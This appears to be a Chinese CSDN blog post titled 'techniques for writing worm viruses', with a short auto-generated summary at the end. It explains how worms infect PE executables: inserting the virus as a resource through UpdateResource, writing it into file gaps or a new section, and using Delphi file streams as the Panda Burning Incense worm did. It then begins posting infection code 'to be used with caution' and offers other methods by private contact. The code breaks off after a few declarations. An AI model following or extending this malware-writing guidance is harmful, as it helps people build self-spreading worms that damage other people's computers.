蠕虫病毒编写技术收藏
<script type="text/javascript">function StorePage(){d=document;t=d.selection?(d.selection.type!='None'?d.selection.createRange().text:''):(d.getSelection?d.getSelection():'');void(keyit=window.open('http://www.365key.com/storeit.aspx?t='+escape(d.title)+'&u='+escape(d.location.href)+'&c='+escape(t),'keyit','scrollbars=no,width=475,height=575,left=75,top=20,status=no,resizable=yes'));keyit.focus();}</script> 现在蠕虫病毒泛滥,网络安全越来越受到威胁,其实主要方面是 一是国内人员技术水平的提高,二是相关技术公开程度也越来越高,其实现在的蠕虫病毒大多属于文件病毒,相关技术也比较简单,本意在于揭开病毒的面纱,了解 病毒的相关技术也有助于自己手动清理,本文公布的代码和技术,如果有人用于不法用途,与本人无关。 一个典型的蠕虫病毒, 一般会遍历感染电脑中的pe可执行文件,对于感染pe文件,不同的编译工具有不同的方法,由于我是用vc++,先说下vc的方法,第一种,可以使用更新资 源的方法,即把把病毒作为资源文件放入宿主文件中,主要用到的api有beginupdateresource、updateresource,第二种方 法要对pe文件格式比较熟悉,我们可以把病毒写入pe文件缝隙里,如果空间不够大,我们可以写入一个新节。当然用汇编实现起来要相对的简单的多。用 delphi的文件流也可以实现感染文件的功能,典型的就是熊猫烧香就是用的这种办法。 这里贴出一个使用更新资源的方法感染的代码,请谨慎使用:(其他方法的实现方法可以联系我获得)char syspath[256]; TCHAR szMyName[MAX_PATH]; TCHAR szTempFileA[MAX_PATH]; TCHAR szTempFileB[MAX_PATH]; GetSystemDirectory(syspath,
蠕虫病毒编写技术
最新推荐文章于 2021-05-25 05:45:40 发布
本文档汇总了蠕虫病毒的编写技术,包括利用DLL、PATH、Delphi和EXE文件进行传播的方法。
摘要由CSDN通过智能技术生成